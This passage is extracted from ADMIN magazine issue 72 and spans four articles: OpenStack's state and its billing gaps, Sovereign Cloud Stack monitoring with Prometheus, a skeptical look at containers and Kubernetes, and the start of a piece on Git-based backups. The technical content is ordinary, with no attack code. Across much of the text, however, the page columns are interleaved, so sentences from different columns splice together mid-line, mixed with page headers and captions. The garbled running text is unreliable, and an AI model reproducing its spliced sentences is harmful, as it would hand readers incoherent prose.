has the major disadvantage that it foreseeable future. viously described outsourcing of tasks
aggressively hogs the host CPU. For to NICs, including offloading support,
this reason, practically all major Kubernetes on the Horizon or the seamless integration of as-a-
network manufacturers are now of- service services from OpenStack in
fering NICs whose chips can process Kubernetes on OpenStack (actu- Kubernetes environments.
Open vSwitch. Therefore, control over ally Kubernetes on OpenStack on Octavia, the load balancer as a ser-
network packet delivery is offloaded Kubernetes) is a fairly common de- vice, plays a prominent role in the
from the host to the NICs, where it is ployment scenario for the free cloud OpenStack universe today but can

Figure 4: The Red Hat OpenStack Platform (RHOP) uses the typical Red Hat look found in other products.© Red Hat

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 17
F E AT U R E OpenStack News

only be meaningfully used for Kuber- manage OpenStack hosts like Open- manually and painstakingly – if they
netes if you have Kuryr. In this case, Stack VMs. TripleO – OpenStack don’t immediately launch their own
meaningful means without stacking on OpenStack – is the name of the wild projects, as is the case in many
several balancer instances on top of construct in this case. A server run- places.
each other. ning with a base OS alone is more or Another aspect of OpenStack that
less meaningless to OpenStack; you has shown a conspicuous absence
Across the Board need the components for it to count of virtually all required features for
as OpenStack. Although they now all many years is billing. The Ceilom-
Many small changes to the various come in the form of containers, you eter component writes user data and
OpenStack services are now occur- still have to roll them out and config- stores it in a database called Gnoc-
ring across the board. In the past few ure them. chi. This component is a pure metric
months, for example, the developers For this reason, OpenStack-Ansible data meter and does not offer any
have massively upgraded Designate. is now part of OpenStack, although a possibility to create invoices with
DNS as a service is important for separate component. It handles tasks the acquired data.
many end users because a website in the TripleO context but can be Granted, OpenStack doesn’t make
hosted on OpenStack also needs to be equally well used standalone to get things easy at this point. The com-
accessible under a brand name and hosts ready for use with OpenStack. plexity of the subject of billing almost
not just an IP address. That this strict separation between implicitly ensures that you need to
For a long time, however, Designate component and deployment from the do more than simply collect data and
was only capable of basic functions early days is no longer practiced is generate an invoice as a PDF. Instead,
and, depending on the network back good and important. All told, it adds it is important to pay attention to
end selected, did not work particu- value to the OpenStack deployment. various aspects. From the customer’s
larly well. Today, Designate is in good point of view, for example, you need
shape, talking to all available SDN What Is Not Better to understand down to the bottom
back ends and offering a cornucopia line what you are actually purchas-
of features. For Yoga, the develop- Despite all the praise for the com- ing. If the provider claims on its
ers have focused on bug and error munity making the right decisions in invoice that a VM ran from 5:35am
hunting, expanding their internal the recent past, OpenStack still has to 6:35am, it must be able to demon-
testing program and eliminating vari- elements that don’t work reliably or strate this plausibly in the event of an
ous bugs. IPv4 and IPv6, distributed at all. Some of these can be tolerated, inquiry. Moreover, various formal re-
name server records, and special but others are very significant. quirements apply to invoices, such as
forms of DNS records (e.g., TXT Today, it is good form for cloud envi- the obligation to number them con-
lines) have all been offered by Des- ronments to offer as-a-service services secutively, the correct disclosure of
ignate for some time. All told – per- to their own user bases. OpenStack sales tax depending on the recipient
haps more than any other OpenStack has various as-a-service components country, and so on. OpenStack devel-
component – Designate demonstrates (e.g., NFS as a service, alias Manila, opers appear to be reluctant to deal
that today the platform’s focus is on is well known). However, not ev- with these details. The premise has
stability and reliability, not just the eryone who runs a web store is an always been that OpenStack would
next big thing. IT geek with a command line back- not handle billing and would use an
ground, so services such as databases external service for this purpose.
Paradigm Shift need to be accessible to less savvy us- For an external service to work ef-
ers. Amazon, for example, is leading ficiently, OpenStack at least needs
What OpenStack developers have the way with its database-as-a-service some sort of generic interface for
done recently in terms of OpenStack offering. exporting arbitrary processed data.
deployment is almost a paradigm shift OpenStack doesn’t seem to be very Many companies rely on proprietary
of sorts. For a long time, the topic innovative when it comes to database accounting tools, to which OpenStack
was considered external: Tools based as a service. Although it already had a would then of course have to con-
on Ansible, Puppet, or Chef, for ex- component for this service on board, nect. In practice, however, OpenStack
ample, were good enough to handle in the form of OpenStack Trove, its already has a problem providing
OpenStack deployment. This line of development has been idle for more data for other services. Quite a few
reasoning crumbled quite early – at than two years, probably because approaches were attempted (e.g.,
the latest, in OpenStack Ironic. the last active maintainer has since CloudKitty, which itself accesses data
The service that establishes lifecycle been poached by a competitor, who from Ceilometer); however, none of
management for hardware of almost deleted the OpenStack topic from the the solutions has been a resounding
any provenance in OpenStack is de- new, joint portfolio shortly afterward. success, and to date only proprietary
scribed as bare metal as a service. OpenStack users are frustrated and products are cobbled together for
Most impressively, Ironic lets you are forced to build their databases specific clouds based on OpenStack.

18 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
A handful of commercial vendors have However, not just OpenStack has in a company’s own cloud. (See the
added OpenStack to their billing tools, changed, but also the industry’s article on SCS in this issue.) Garloff
but companies that don’t use one of take on the project. It is no longer has already found some helpers,
these tools continue to be frustrated. the case that the smallest service and the technical development of
If you want to run OpenStack in a providers are trying to join the SCS is certainly something that
way that makes sense, not only tech- OpenStack circus, because the so- whets your appetite for more. Com-
nically but also commercially, you lution is now considered a profes- petition and diversity don’t hurt,
more or less have to build the entire sional tool for large environments. so here’s hoping SCS can establish
billing system yourself. It is high time One concern for some is that it itself as an alternative to the big
for developers to come up with a has also significantly reduced the two and help OpenStack gain new
generic interface that billing service number of vendors with OpenStack momentum. Q
providers can dock onto. products in their portfolio. Apart
from Canonical and Red Hat, none
Conclusions of the big vendors offer a serious Info
OpenStack distribution. [1] Sovereign Cloud Stack:
Much achieved, much to do – that is Resistance is brewing. Kurt Garloff, [https://scs.community]
my conclusion with regard to Open- who is very well connected in the
Stack after a little more than 12 years open source and OpenStack scene, The Author
of project history. What started life has been working for some time on Freelance journalist Martin
as a cooperation between NASA and his Sovereign Cloud Stack (SCS) [1], Gerhard Loschwitz focuses
Rackspace has become a comprehen- which is based on OpenStack at its primarily on topics such
sive platform for private clouds with core (Figure 5) and is intended to as OpenStack, Kubernetes,
high standards. enable data sovereignty by operating and Chef.

Figure 5: Sovereign Cloud Stack provides a reference architecture for clouds with OpenStack at its core. © Sovereign Cloud Stack

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 19
F E AT U R E Sovereign Cloud Stack

OpenStack observability with Sovereign Cloud Stack

Guard Duty
Operators of an OpenStack environment need to know whether the environment is working and quickly pinpoint
problems. We look at the basics of OpenStack observability in the Sovereign Cloud Stack. By Felix Kronlage-Dammers

The Open Source Business Alli- standards and a reference implemen- SCS provides the foundations for cre-
ance (OSBA) Sovereign Cloud Stack tation. SCS [1] is an open, federation- ating offerings that deliver full digital
(SCS) project was launched in 2019 capable modular cloud and container sovereignty.
to enable federation-capable cloud platform based on open source soft-
environments. In close collaboration ware. It builds on proven open source SCS Community
between the community and OSBA’s components such as OpenStack and
SCS team, the project uses an agile Kubernetes in the reference imple- The community comprises a wide
approach to create the appropriate mentation (Figure 1). As a platform, variety of cloud service providers
Photo by Michaela Filipcikova on Unsplash

Figure 1: Visualization of the relationships between Sovereign Cloud Stack components.

20 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Sovereign Cloud Stack F E AT U R E

(CSPs) and their employees, people information on whether or not a ser- To avoid getting lost in discussions
from the OpenStack community, and vice feature is available). Monitoring relating only to the tool right from
companies working on deliverables in line with contemporary standards the outset, the first step was to take a
that are awarded through open ten- also includes collecting, storing, and tool-agnostic look at the architecture.
ders. Collaboration between the dif- visualizing metrics and aggregating Figure 2 shows the intended architec-
ferent providers creates a level of co- log messages. The overall system ture. First, the various roles were de-
operation that rarely exists elsewhere. enables the operator to get a com- fined. The SCS Operator is the system
Various teams and special interest prehensive picture of their system to operator (e.g., the CSP), whereas the
groups (SIGs) work together on the locate problems, their origins, and SCS Integrator describes the compa-
topics, coordinating standards and causes quickly. nies that assist the operator in setting
requirements in terms of content. The In the CSP environment, additional up and commissioning the system, if
primary goals of SCS are for teams to requirements to delete accruing data needed.
take an active part in the respective are based on appropriate specifica- For several reasons, the developers
upstream projects, to be involved in tions. Additionally, for compliance made a deliberate decision to ignore
the creation of content, and not to al- reasons, certain system messages the container layer in the first step
low a parallel world to develop. need to be logged or billing data gen- and focus instead on the infrastruc-
The first such group to be formed out erated from the metrics that occur. ture-as-a-service (IaaS) layer. On the
of the Operations and Identity and Ac- one hand, this approach reduced
cess Management team was the Moni- Architecture complexity and the number of deci-
toring SIG, which is dedicated to the sions. On the other hand, observ-
topics of monitoring and observability. When the SIG was founded a year ability was part of an award package
ago, it first collected the require- that was not scheduled until 2022. At
Observability ments of the participating CSPs and the IaaS level, the focus is on Open-
contrasted them with the individual Stack with its various components
Observability does not just mean components already covered in the (Figure 3).
plain vanilla state analysis (i.e., reference implementation.
Components and Tools
SCS relies on the Open Source In-
frastructure and Service Manager
(OSISM) [2] as a tool for deploy-
ment and day 2 operations for
OpenStack. OSISM itself relies
heavily on Kolla Ansible [3] and
on OpenStack-Ansible, a collection
of Ansible playbooks for deploying
OpenStack. One of the main focuses
of OSISM is to simplify the opera-
tion of OpenStack-based systems
and, in particular, upgrades from
one OpenStack version to the next.
The goal is to be able to install up-
dates on a system at any time.
Kolla Ansible comes with a Pro-
Figure 2: The tool-agnostic architecture of SCS. metheus-based [4] monitoring stack
out of the box, which coincided
very well with the Monitoring SIG
favoring an OpenMetrics-based ap-
proach from the outset. Initially, the
use of traditional monitoring soft-
ware, such as Zabbix or Icinga for
service state monitoring, was con-
sidered. However, it became clear
relatively quickly in the discussions
that these scenarios could just as
easily be covered by Prometheus’
Figure 3: The IaaS monitoring components of SCS. Blackbox exporter. With a view to

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 21
F E AT U R E Sovereign Cloud Stack

reducing complexity, it makes sense the idea of integrating it directly To monitor OVN efficiently, the SIG
to rely on the Blackbox exporter was considered; however, for the is currently working on integrating
instead of a completely independent time being, Alert Manager was the OVN exporter [8] upstream to
software solution. These changes deemed sufficient. provide various OVN metrics for Pro-
were incorporated into OSISM; Zab- Alert rules are an important part of metheus. Figure 5 illustrates where
bix, which had previously been in- Prometheus monitoring. To create a the exporter needs to reside to cap-
cluded, was dropped. good starting point, several rule sets ture data from the redundant compo-
As a first step, additional dashboards have been adopted from the Awe- nents and detect failures.
were provided for Grafana (Figure 4) some alert rules [7] project, and they
and integrated into the Kolla An- are now also making their way into From Health Monitor to
sible project. Additionally, various Kolla Ansible.
exporters for Prometheus, which are
CloudMon
currently not part of Kolla Ansible, There’s Monitoring and OpenStack Health Monitor is an
should be included. important component for the SCS
Then There’s Monitoring project. The program relies on the
Alerting When the talk turns to monitor- OpenStack API to cover various sce-
ing, people tend to talk first about narios and assess the functionality of
Alerting is an important component simple process monitoring. Does the an OpenStack cloud from a customer
in any monitoring setup. It quickly Foo process exist, and does the Bar perspective.
became clear in the Monitoring SIG service respond on port 42? Often, The OpenStack Health Monitor pe-
that every CSP that is not just start- instead of simply checking whether riodically installs virtual machines,
ing to commission a corresponding a service responds on a port, it is a creates load balancers, and checks
environment already has an alert- good idea to use test scenarios that the availability of these components.
ing system in operation. Ideally, the carry out a functional check of the It also logs runtimes so that changes
monitoring supplied with SCS would service. such as delayed provisioning of vir-
dock onto it. For example, in an environment tual machines can be tracked. This
Therefore, the decision was made to like OpenStack, it’s helpful to know feature is especially helpful when
opt for the Prometheus Alert Man- whether the Horizon web front end changes are made to the system en-
ager, which is already integrated is being delivered correctly to the vironment, such as after an upgrade
in Kolla Ansible, and to document browser or whether an API should to OpenStack components, to help
best practices [5] for connecting to be used to check that VMs can be identify problems – ideally before end
external alerting systems. The open started. However, checking a network users notice them.
source Alerta [6] software provides component such as Open Virtual Net- The OpenStack Health Monitor first
an alternative for aggregating alert work (OVN) for correct functionality saw the light of day more than four
occurrences at this point. Initially, can become complex. years ago in the Open Telekom Cloud

Figure 4: The Grafana dashboard of the OpenStack Health Monitor.

22 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Sovereign Cloud Stack F E AT U R E

Outlook Info
[1] SCS: [https://scs.community/]
One of the next [2] OSISM: [https://osism.tech/]
priorities for the [3] Kolla Ansible: [https://docs.openstack.
Monitoring SIG org/kolla-ansible/latest/]
will be to expand [4] Prometheus: [https://prometheus.io]
log management. [5] Alertmanager best practices: [https://
Kolla Ansible github.com/SovereignCloudStack/
currently pro- Docs/blob/main/Operational-Docs/
vides a fluentd integrating-alertmanager.md]
daemon along [6] Alerta: [https://alerta.io]
with Elastic- [7] Awesome alert rules: [https://
Search for log awesome-prometheus-alerts.grep.to]
shipping. Espe- [8] OVN exporter: [https://github.com/
cially in terms greenpau/ovn_exporter]
of compliance [9] Keynote on APIMon: [https://www.
requirements in youtube.com/watch?v=Em8TfiUlXF4]
Figure 5: Open Virtual Network setup with Prometheus exporters. the CSP environ- [10] OSISM testbed:
ment (think au- [https://docs.osism.tech/testbed/]
(OTC). The project was initiated then dit logging), an installed SCS environ- [11] Contribute to SCS:
by Kurt Garloff, who is the current ment would ideally already include [https://scs.community/contribute/]
CTO of the SCS project. Colleagues at appropriate underpinnings. It would
OTC have since further developed the provide SCS operators best practices Author
OpenStack Health Monitor for their for aggregating relevant log messages, Felix Kronlage-Dammers has been building
environment and presented the result- such as those relating to attempted open source IT infrastructure since the late
ing APIMon project at the OpenInfra logins processed by Keycloak. 1990s. Between then and now, he was part of
Summit 2020 [9]. The reference implementation of the various open source development communities,
Following OpenInfra Summit 2022, Sovereign Cloud Stack can be easily from DarwinPorts to OpenDarwin to OpenBSD
APIMon developers met with mem- put through its paces in the OSISM and, nowadays, the Sovereign Cloud Stack. His
bers of the SCS community to con- testbed [10], and it also provides interests range from monitoring and observability
sider how to collaborate on the next a good introduction to the project. over infrastructure as code to building and scaling
iteration. The intent was to develop All meetings related to SCS can be communities and companies. He has been part of
and maintain an independent suc- viewed on the project website under the extended board of the Open Source Business
cessor project, CloudMon, to serve Contribute to SCS [11]. SCS is cur- Alliance (OSBA) for six years and describes
as a reference for behavior-driven rently looking for developers to join himself as a Unix/open source nerd. If not
monitoring. the community. Q working, he is usually found on a road bike.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 23
F E AT U R E Container Issues

When are Kubernetes


and containers not a
sensible solution?

Curb Complexity
As the major Linux distributors increasingly lean toward containers, many administrators have come to realize
that containers are by no means a panacea for all their problems. By Martin Loschwitz

Containers, Kubernetes, Rancher, Ceph as a Negative Example containing the correct addresses for
OpenShift, Docker, Podman – if you the MON servers, will not work.
have not yet worked in depth with If you are in an environment far re- In other words, Red Hat forces you
containers and Kubernetes (aka moved from a greenfield, you can to plumb the depths of containeriza-
K8s), you might sometimes get the face some disadvantages. Ceph, the tion, whether you want to or not.
impression that you have to learn a distributed object storage solution, is Of course, from the manufacturer’s
completely new language. Container- one example. If you believe the ven- point of view, this scenario makes
based orchestrated fleets with Kuber- dor Red Hat, containerized deploy- perfect sense. Red Hat only has to
netes have clearly proven that they ment is now the best way to roll out maintain one version of Ceph per
are not a flash in the pan, but all of Ceph. All of the Ceph components major release to have executable pro-
this omnipresent lauding of contain- come in the form of individual con- grams for Red Hat Enterprise Linux
ers is getting on the nerves of many. tainers, which cephadm then force-fits in all versions and their derivatives,
Whichever provider portfolio you on systems. and even for Ubuntu or SUSE. Wher-
assess, it seems that the decisive fac- This arrangement is all well and ever a runtime environment for con-
tor for success is answering a simple good, but if you are used to work- tainers is available, these containers
question: How do I get my entire ing with Ceph and then try to run a will eventually work in an identical
portfolio cloud-ready as quickly as simple ceph -w at the command-line way. However, administrators are
possible? interface (CLI) to discover the cluster quite right to resist being told what’s
The problems and challenges inherent status, you are in for a nasty surprise: best for them.
in containers and K8s are too often for- Command not found is what you will
gotten. I address this article to all ad- see in response. Logically, if all of the Containers Are Not Always
mins who still view the container hype Ceph components are in containers,
with a healthy pinch of skepticism. In so are Ceph’s CLI tools (Figure 1).
Needed
concrete terms, the question is what The cephadm shell command does Up and down the IT space, vendors
Photo by Kelly Sikkema on Unsplash

are the use cases in which containers let you access a virtual environment promote containers as the universal
do not offer a meaningful alternative where you can run the appropriate panacea for all problems. Applica-
to existing or new setups. When does commands, but userland software tions must be cloud-ready; if you still
it make more sense to avoid the tech- does not benefit. Programs that need don’t rely on containers in your envi-
nical overhead of migration because the Librados API for low-level access ronment, you are – at the very least –
a particular case will (hardly) benefit to the RADOS service, or even depend behind the times, if not actively
from migrating anyway? on /etc/ceph/ceph.conf existing and blocking innovation. Anyone who

24 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Container Issues F E AT U R E

manager’s distribution lists with a


digital PGP key. With a signed file,
you can then check whether the in-
stalled package matches the package
listed there (e.g., whether the SHA256
checksums of the individual files
match). This way of tracking whether
any local changes have been made to
the package content is both excellent
and compliant.
The situation is quite different in the
case of container images. The major
vendors also offer ready-made base
images, but these image do not typi-
cally contain any services. You have
two possible courses of action:
creating your own environment for
continuous integration and continu-
Figure 1: A containerized Ceph presents challenges to those without experience with ous deployment (CI/CD), or grabbing
containers, including not being able to find the familiar tools where they normally hang out. ready-made images off the web.

hasn’t learned the ideal architecture a running container, checks out the Complex CI/CD Structure
of a Kubernetes cluster by rote must new version of the image, starts it
have been asleep for the last 25 years. with the old configuration and data, If you choose the first option of
One fundamental problem with the and the job is done. creating your own environment for
entire container debate is that the Containers also initially offer more CI/CD, you inevitably get to use
distinction is small between techni- in terms of security than the estab- tools like Jenkins or Zuul. The idea
cal strategies that don’t necessarily lished competitors. Under the hood, behind these tools is that, on the
belong together – even if they might containers are ultimately no more basis of distribution images, CI/CD
complement each other. To begin, you than a combination of various Linux systems automatically build a new
need to distinguish clearly between kernel tools that isolate processes image when a new software version
containerization strategies, as such, from the rest of the system and from is released and prepare it such that
and container orchestration. each other. If a vulnerable web server you only have to confirm production
Applications in containers may well is running in the container and an deployment by pushing a button.
have their uses outside of Kubernetes, attacker gains unauthorized access, The rollout itself is handled by the
and not just from a provider perspec- they will be trapped in the container CI/CD system, so your workload is
tive; however, if all the terms and de- and not normally be able to get out. kept within narrow limits, because
scriptions end up in one big pot and This one additional layer of security, the degree of automation in setups of
are applied arbitrarily, at the end of at least, is missing in applications this type is very high.
the day, no one knows what the de- without a container layer. The bad news is that if you don’t
bate is actually about. Therefore, this want to buy a ready-made CI/CD
article looks at containerization and The Security Myth system for a large amount of money,
Kubernetes separately. you will have to spend time build-
If you take a closer look, however, the ing one. Jenkins and the like are
Containers Are Practical myth of secure containers quickly and complex tools that can hardly be
decidedly crumbles. As with pack- described as self-explanatory. Much
Containers are practical in many ages, containers ultimately depend on time and effort goes into putting
ways. Time and time again, advocates who their originator is and whether it together a CI/CD system that ulti-
of the principle argue that the depen- is a trusted entity. mately gives you the same condi-
dency hell of classic package manage- The popular package managers of- tions that RPM, dpkg, and other
ment almost no longer exists with fered by the major distributors have package management systems have
containers. Ultimately, each container long since solved this problem. Both provided for decades.
doesn’t just come with the applica- RPM and dpkg have mechanisms Don’t forget updates and how they
tion itself, but also with the userland, to establish a chain of trust that is are handled. You justifiably trust that
which works autonomously. This documented right down to the pack- running apt dist-upgrade on your
setup also makes updating easier. age installed on a system. To this end, system will apply all the security up-
If in doubt, the admin simply stops most distributors sign their package dates offered by Canonical or Debian.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 25
F E AT U R E Container Issues

The Myth of Dependency Hell


The dependency hell many admins
want to escape by deploying con-
tainers is actually a relic of the past
(Figure 2). If you only use packages
from the manufacturer, from properly
maintained backport directories or
(often) from application vendors on
your systems, you will rarely face is-
sues at installation and update time
because Red Hat, SUSE, Debian, and
others have done their homework
and today even support cross-version
updates (e.g., from Ubuntu 20.04 to
Ubuntu 22.04 at Canonical). If you
Figure 2: The only systems that fall victim to the notorious dependency hell today are run and are familiar with a defined
those that use poorly maintained third-party software. © reddit.com/Pablo set of services on your systems, you
will reach your objectives far faster
However, if you rely on CI/CD, you many cases, these images do not give with classic packages than with a
need to track security updates yourself you an opportunity to understand complete CI/CD environment.
and replace any affected containers in- how they were built; consequently,
dividually rather than collectively. you can only guess what is hidden Automation is a Good Thing
inside.
More Overhead Detours In the past, several Docker Hub im- Automation is necessary, especially
ages for various services turned out to for scenarios in which classic automa-
CI/CD systems are by no means be Bitcoin miners in disguise. Other tion by Ansible and similar tools plays
self-perpetuating, then, and in some images are uploaded only once and a significant role. Another advantage
respects, they even cause more work are not maintained by their original that container advocates like to men-
than legacy package managers. Quite authors after the event, and if a se- tion is that CI/CD systems offer great
a few admins try to avoid this work curity update is due for the program, automation resources, and systems
and instead resort to ready-made im- you are left out in the cold. The use can be restarted quickly if something
ages off the web. Docker Hub is a of these black boxes in production op- goes catastrophically wrong. After all,
popular source for such images, but eration can therefore only be strongly so the story goes, all you need to do it
anyone can upload virtually any im- and categorically advised against. If is roll out the container, including the
age there – and in any form. you use them despite the warnings, configuration, on another system and
Although ready-made images are you are turning the security advan- start it there again.
available directly from the manu- tages of containers into the complete Unfortunately, this story ignores the
facturers for popular services such opposite and will end up with signifi- fact that comparable setups might not
as MariaDB or MongoDB, images of cantly less secure systems than would have containers and instead reside
lesser known software can often only be the case if you used a legacy pack- on bare metal. Physical hardware, for
be obtained from the community. In age manager. example, can easily be managed by

Figure 3: Life-cycle managers like Foreman help you get systems back up and running again quickly by reinstalling after a problem.
Containers are not needed. © Foreman

26 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Container Issues F E AT U R E

open source software such as Fore- briefly mentioned at the beginning, you will have to deal with three dif-
man (Figure 3). As the administrator, but which deserves closer consider- ferent runtime environments, two
you then have access to comprehen- ation: Containers running on systems completely different CLIs, and various
sive life-cycle management features are unfamiliar to sys admins in their compatibility problems.
that let you reboot remotely, reinstall, everyday work and are usually more
and completely wipe computers. If complex to handle, precisely because Confused Debugging
you can, and want to, commit specifi- the administrator is dealing with the
cally to one manufacturer, Red Hat runtime environment for containers. Even if you can exclusively rely on
(Red Hat Satellite), SUSE (SUSE Man- Access to the services is by way of Podman, Docker, or Snap, you will
ager), and Canonical (Landscape) this environment. quickly realize in everyday life that
also have boxed products on the shelf Your worries start here. If you use Red containers make many things more
that can be rolled out in a short time. Hat Enterprise Linux 8 or one of its complicated. For example, if you want
Besides, today’s administrators have clones, you will only be able to access a service running in the container to
a full arsenal of well-developed, per- the classic Docker engine by round- start automatically at system startup
fectly tested automation tools at their about paths and unofficial sources. time, you need a systemd init file.
disposal. Whether you go for Puppet, Not only can this become a problem However, this file needs to interact
Chef, Salt, or Ansible, all of these tools in terms of security and compliance, with the container management soft-
can handle simple tasks, such as in- it’s something that can really get on ware instead of simply starting the
stalling a service and rolling out a tem- your nerves, because Red Hat has respective service directly.
plate-based configuration file quickly long since said goodbye to Docker Speaking of container management,
– without detouring through CI/CD. and is instead going its own way in tales of admins desperately trying
If a server suffers a hardware failure, the form of Podman, assuring you to find their output on the stdout of
a combination of Foreman and An- that they are completely compatible their running containers almost sound
sible will cleanly reinstall it, along with Docker at the command line. like urban legends. In Ceph, for ex-
with its required services and their In everyday life, however, you will ample, the OSDs and MONs write
configurations, in a matter of minutes quickly discover that the purported their own logfiles, which you will
and without any involvement from compatibility between Podman and find in /var/lib/ceph/osd/ on the host
Docker or Podman. Of course, you Docker is not great in many places. systems. However, they do not con-
have to establish a valid automation If you look at the other vendors, the tain the messages directly from the
story, but even that will be faster and situation is not much better: The services. If you need these, you can
easier than working with Jenkins and Community Edition of Docker for instead tap into the running container
the like, in many cases. SUSE, Debian, and Ubuntu might with docker logs -f (Figure 4).
still be available unchanged, but In defense of containers, I have to
More Complicated Handling Canonical would prefer its own us- admit, many of these difficulties
ers to rely on Snap (i.e., Canonical’s can be configured, but in view of all
Another factor that clearly speaks own format). If you manage systems these factors, the claim that contain-
against containers is something I from Red Hat, Debian, and Canonical, ers work better, faster, more reliably,

Figure 4: If you want to see the error messages generated by containerized Ceph services on stdout, you need to dock directly with the
container, instead of accessing a normal logfile.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 27
F E AT U R E Container Issues

and more securely than packages out cloud computing and makes great because it becomes easier to handle
of the box is something I very much sense, especially against this back- applications. The fact that this only
doubt. ground. applies if the applications are suit-
If you also look at the way services A few years ago, Docker had just able for operation in containers at all
running in containers are connected made containers on Linux respectable and, even then, that many conven-
to the local network, more doubts after solutions like OpenVZ had failed tional applications present their own
raise their ugly heads. Because con- to do so for decades. The primary rea- challenges, is deliberately concealed
tainers are designed out of the box son Docker was successful is that it by the advertising blurb. Most of
not to be bound to the IP addresses offered not only the runtime environ- the problems already described for
of the host system, Docker and oth- ment for containers on Linux but also containers without K8s also apply to
ers use port forwarding as a ploy. created a suitable ecosystem, which containers in Kubernetes. Granted,
The containers then open a virtual undoubtedly included the aforemen- some companies are using the move
network on the host, to which the tioned Docker Hub. to containers and Kubernetes to
kernel forwards packets for the At the time, however, cloud com- make a clean sweep of their exist-
target IP. Conversely, then, debug- puting had long been seen as the ing application landscape, and even
ging with tools like tcpdump is more means of choice for companies rewriting some parts of it, but this is
complicated than in conventional that wanted to move from being IT by no means possible or affordable
environments. heroes to major platform provid- in every case.
ers and at least play in a league Kubernetes also is designed in the
Interim Conclusions similar to Amazon. Containers best possible way to scale seamlessly
promised huge dividends because across the board (i.e., to provide the
No matter how you spin it, con- both orchestration and automation underpinnings of an eternally grow-
tainers do have their advantages, combined with prepackaged appli- ing platform). However, you only re-
but they require the administrator cations are effectively the highway ally need this if you want to operate a
to navigate a huge learning curve, to platform-as-a-service (PaaS) and platform that can handle any amount
while not solving certain problems software-as-a-service (SaaS) offer- of data and services. If you have a
as elegantly as can a combination ings. What was still missing was clearly separated setup in mind with
of classic automation and package a solution that could manage and a defined target size (with some
management. If you have a clear control containers across any num- scope for fluctuation), you will be
idea of the services you want to ber of physical hosts in a completely hard put to use most of Kubernetes’
run, and on what systems, you will automated way. Kubernetes quickly functionality in a meaningful way. In
fare better and enjoy more stabil- established itself as a solution for these cases, K8s quickly becomes a
ity from a combination of Ansible, precisely this task, if only because hyper-complex chunk at the end of
configuration templates, and classic the product, as an in-house develop- the process, the complexity of which
packages from the providers. Most ment at Google (up to that point), bears no relation to the actual needs
importantly, you will have less com- was explicitly designed for that and benefits.
plexity than Docker, Podman, and purpose.
the other container solutions. Conclusions
Over-the-Top Hype
Kubernetes: Yes, but … Kubernetes is primarily of interest to
The vast majority of features that K8s enterprises that want to run arbitrary
In the second and significantly has seen added in recent years, or that numbers of containers for SaaS or
shorter part of this article, I really can be retrofitted with external tools, PaaS applications across large fleets
need to mention Kubernetes, the soft- are for the PaaS and SaaS deployment of physical systems. Kubernetes can
ware that has undoubtedly given the areas already described. Kubernetes is also be used for internal purposes.
container hype triggered by Docker far less well suited for classic informa- For example, if you are converting
a massive boost. Admins love mod- tion as a service (IaaS), for example. your production software to as-a-ser-
ern technology, and once a solution This niche is where classic virtual vice principles, Kubernetes will serve
becomes popular, it attracts admins machines (VMs) based on KVM or Xen you well internally. In this respect,
like moths to the flame, as was the play to their strengths. operating a K8s platform is by no
case with Kubernetes. For years, it In some ways, this insufficiency is means tied to being a major platform
has been the talk of the town. That the crux of the problem, although it provider.
said, many Kubernetes-based solu- has never stopped many Kubernetes If you’re looking for a solution that
tions presented today completely lose service providers from selling K8s as rolls out individual applications in a
sight of what the software is all about a solution to life, the universe, and neatly automated and scalable way,
and what problem it looks to solve: everything. Local setups, so the story though, you’ll have an easier life with
Kubernetes comes from the world of goes, also benefit from Kubernetes a solution that is based on classic

28 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Container Issues F E AT U R E

automation, just as you did with con- pairings are far easier to handle and just the continuation of virtualiza-
tainers. If required, the automation maintain than K8s, and accordingly tion by other means. Q
can be combined with virtualization: offer less functionality.
The combination of VMware or KVM For many companies embarking on The Author
and Ansible is found in many places. the Kubernetes adventure without Freelance journalist Martin
Virtualization solutions such as Prox- a clear roadmap, the functionality Gerhard Loschwitz focuses
mox (Figure 5), which can be easily offered by classic automation will primarily on topics such
integrated with existing automation, be completely sufficient: Containers as OpenStack, Kubernetes,
are also helpful. Almost all of these and container automation are not and Chef.

Figure 5: Like other virtualization solutions, Proxmox Virtual Environment can easily team up with many automation tools, ensuring a kind
of scalability. However, the entire setup is far less complex than a full-blown K8s environment. © Proxmox

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 29
TO O L S Git Versioned Backups

Versioned backups of local drives with Git

Genealogy
Versioning is a recommended approach to back up files as protection against hardware failures and user errors.
To create versioned backups, you can use established backup programs or an open source tool that originates
from the developer world: Git. By Andreas Stolzenberger

Despite cloud and file servers on the Q Optional remote backup over wide and filesystem – and not a propri-
corporate network, users still store im- area network (WAN) etary file format.
portant files on the local hard drives of Q Backup and recovery independent Anyone who creates a Git repository
their workstations or laptops. Modern of the operating system first creates an object store with cop-
solid-state drives (SSDs) lull users into On the free market, all common op- ies of the selected data. This object
a deceptive sense of security: Thanks erating systems have tons of backup store keeps track of the changes
to technologies such as self-monitoring programs – many with inexplicably in the files saved in it. As soon as
analysis and reporting technology confusing user interfaces. For most the user makes a “commit” (i.e., a
(S.M.A.R.T.) and wear leveling, these users, the backup chain ends at the snapshot of the files), Git remembers
data storage devices can predict their USB drive, but if you want to back the changes to the previous version.
demise and usually warn the user in up your data, it is better to use a net- Users can roll back the entire reposi-
time before a disk failure. However, work share. Common cloud backup tory or individual files to previous
valuable data is rarely lost by spontane- tools, on the other hand, back up versions if they want and recover ac-
ous disk failure. More often, the cause directly to the connected cloud and cidentally deleted information from a
of data loss is the users themselves ac- therefore only work if you are online. previous snapshot.
cidentally deleting or overwriting files. However, Git does not just back up
If you travel with your laptop, you also Backup with Git its repository on the local system.
have to worry about losing the device Users can create one or more remote
or damaging it irreparably. The Git [1] tool supports code ver- copies of the repository and upload
A device and its operating system and sioning, shows the details of the the versions there. Luckily, remote
applications can be replaced quickly, differences between saved versions, repositories do not need to receive
but it’s a different story for user files. and allows multiple developers to every single commit immediately.
Therefore, every user with important work together on a project. Because A user can write many consecutive
commits to the local repository and
Photo by Roman Kraft on Unsplash

